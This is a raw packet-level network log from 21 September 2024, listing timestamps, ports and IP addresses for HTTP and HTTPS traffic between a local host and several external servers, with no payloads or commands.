Sep 21, 2024 14:48:10.802320957 CEST	49726	443	192.168.2.9	162.241.61.218
Sep 21, 2024 14:48:10.803147078 CEST	443	49726	162.241.61.218	192.168.2.9
Sep 21, 2024 14:48:10.803209066 CEST	49726	443	192.168.2.9	162.241.61.218
Sep 21, 2024 14:48:10.804011106 CEST	443	49726	162.241.61.218	192.168.2.9
Sep 21, 2024 14:48:10.804076910 CEST	49726	443	192.168.2.9	162.241.61.218
Sep 21, 2024 14:48:10.804572105 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.804579973 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.804585934 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.804630995 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.804631948 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.804640055 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.804641008 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.804646015 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.804652929 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.804687023 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.804716110 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.809144974 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.809242010 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.809248924 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.809261084 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.809267044 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.809273005 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.809278965 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.809286118 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.809315920 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.809353113 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.812509060 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.812516928 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.812522888 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.812573910 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.812592030 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.812598944 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.812599897 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.812619925 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.812643051 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.812671900 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.812720060 CEST	443	49729	162.241.61.218	192.168.2.9
Sep 21, 2024 14:48:10.812724113 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.812731028 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.812764883 CEST	443	49729	162.241.61.218	192.168.2.9
Sep 21, 2024 14:48:10.812767982 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.812804937 CEST	49729	443	192.168.2.9	162.241.61.218
Sep 21, 2024 14:48:10.812808037 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.812825918 CEST	443	49729	162.241.61.218	192.168.2.9
Sep 21, 2024 14:48:10.812839031 CEST	49729	443	192.168.2.9	162.241.61.218
Sep 21, 2024 14:48:10.813210964 CEST	49729	443	192.168.2.9	162.241.61.218
Sep 21, 2024 14:48:10.814302921 CEST	443	49729	162.241.61.218	192.168.2.9
Sep 21, 2024 14:48:10.814348936 CEST	443	49729	162.241.61.218	192.168.2.9
Sep 21, 2024 14:48:10.814367056 CEST	49729	443	192.168.2.9	162.241.61.218
Sep 21, 2024 14:48:10.814373016 CEST	443	49729	162.241.61.218	192.168.2.9
Sep 21, 2024 14:48:10.814403057 CEST	49729	443	192.168.2.9	162.241.61.218
Sep 21, 2024 14:48:10.814421892 CEST	49729	443	192.168.2.9	162.241.61.218
Sep 21, 2024 14:48:10.815314054 CEST	443	49729	162.241.61.218	192.168.2.9
Sep 21, 2024 14:48:10.815387964 CEST	49729	443	192.168.2.9	162.241.61.218
Sep 21, 2024 14:48:10.816282988 CEST	443	49729	162.241.61.218	192.168.2.9
Sep 21, 2024 14:48:10.816344976 CEST	49729	443	192.168.2.9	162.241.61.218
Sep 21, 2024 14:48:10.819880962 CEST	443	49726	162.241.61.218	192.168.2.9
Sep 21, 2024 14:48:10.819955111 CEST	49726	443	192.168.2.9	162.241.61.218
Sep 21, 2024 14:48:10.833035946 CEST	443	49729	162.241.61.218	192.168.2.9
Sep 21, 2024 14:48:10.833151102 CEST	49729	443	192.168.2.9	162.241.61.218
Sep 21, 2024 14:48:10.835192919 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.835207939 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.835213900 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.835218906 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.835226059 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.835263014 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.835268021 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.835278988 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.835280895 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.835287094 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.835293055 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.835313082 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.835331917 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.835747004 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.835752964 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.835767031 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.835772038 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.835788965 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.835794926 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.835800886 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.835805893 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.835808039 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.835818052 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.835823059 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.835828066 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.835829973 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.835839033 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.835845947 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.835850954 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.835876942 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.835896015 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.839673042 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.839746952 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.839751959 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.839766026 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.839772940 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.839778900 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.839785099 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.839787960 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.839790106 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.839827061 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.839843035 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.842974901 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.843054056 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.843060017 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.843065977 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.843071938 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.843101978 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.843107939 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.843121052 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.843234062 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.843281031 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.843288898 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.843296051 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.843302965 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.843317032 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.843348026 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.843353033 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.843359947 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.843367100 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.843379974 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.843413115 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.843421936 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.843481064 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.843487978 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.843493938 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.843503952 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.843509912 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.843514919 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.843521118 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.843524933 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.843527079 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.843548059 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.843579054 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.843641043 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.843647003 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.843653917 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.843658924 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.843664885 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.843669891 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.843677044 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.843688011 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.843694925 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.843696117 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.843702078 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.843709946 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.843727112 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.843750000 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.843750000 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.843786001 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.843794107 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.843805075 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.843811035 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.843822956 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.843836069 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.843841076 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.843842983 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.843848944 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.843853951 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.843858957 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.843863964 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.843868971 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.843880892 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.843888044 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.843902111 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.843924999 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.843931913 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.843936920 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.843940020 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.843943119 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.843950033 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.843961000 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.843971014 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.844001055 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.844017029 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.844023943 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.844032049 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.844043016 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.844048977 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.844063997 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.844069958 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.844077110 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.844077110 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.844084024 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.844095945 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.844101906 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.844108105 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.844115019 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.844134092 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.844151974 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.844155073 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.844338894 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.844346046 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.844352007 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.844357014 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.844362974 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.844367981 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.844382048 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.844386101 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.844393015 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.844398022 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.844398975 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.844404936 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.844412088 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.844419003 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.844446898 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.844465017 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.844510078 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.844516993 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.844528913 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.844535112 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.844556093 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.844566107 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.844573975 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.844580889 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.844580889 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.844593048 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.844599962 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.844602108 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.844604969 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.844611883 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.844629049 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.844660997 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.844700098 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.844715118 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.844722033 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.844727039 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.844733000 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.844738960 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.844746113 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.844748020 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.844758987 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.844784975 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.844795942 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.844831944 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.852971077 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.852982044 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.852997065 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.853003979 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.853012085 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.853022099 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.853029966 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.853044033 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.853045940 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.853050947 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.853056908 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.853082895 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.853096962 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.853122950 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.853130102 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.853142023 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.853147984 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.853153944 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.853163958 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.853188992 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.853188992 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.853214025 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.853216887 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.853220940 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.853234053 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.853240013 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.853246927 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.853271008 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.853290081 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.853331089 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.853338003 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.853343964 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.853351116 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.853375912 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.853390932 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.853404045 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.853410959 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.853416920 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.853421926 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.853430033 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.853456974 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.853467941 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.853492022 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.853692055 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.853738070 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.853749037 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.853754044 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.853766918 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.853779078 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.853785992 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.853785992 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.853801966 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.853807926 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.853818893 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.853818893 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.853827000 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.853857040 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.853871107 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.853871107 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.853943110 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.853960037 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.853965044 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.853976011 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.853982925 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.853987932 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.854015112 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.854028940 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.854082108 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.854088068 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.854100943 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.854115009 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.854120970 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.854125977 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.854130030 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.854131937 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.854137897 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.854151964 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.854156971 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.854172945 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.854182005 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.854197025 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.854198933 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.854203939 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.854211092 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.854217052 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.854245901 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.854269028 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.854280949 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.854286909 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.854317904 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.854325056 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.854330063 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.854338884 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.854346037 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.854351044 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.854362965 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.854378939 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.854428053 CEST	49712	80	192.168.2.9	103.130.147.211
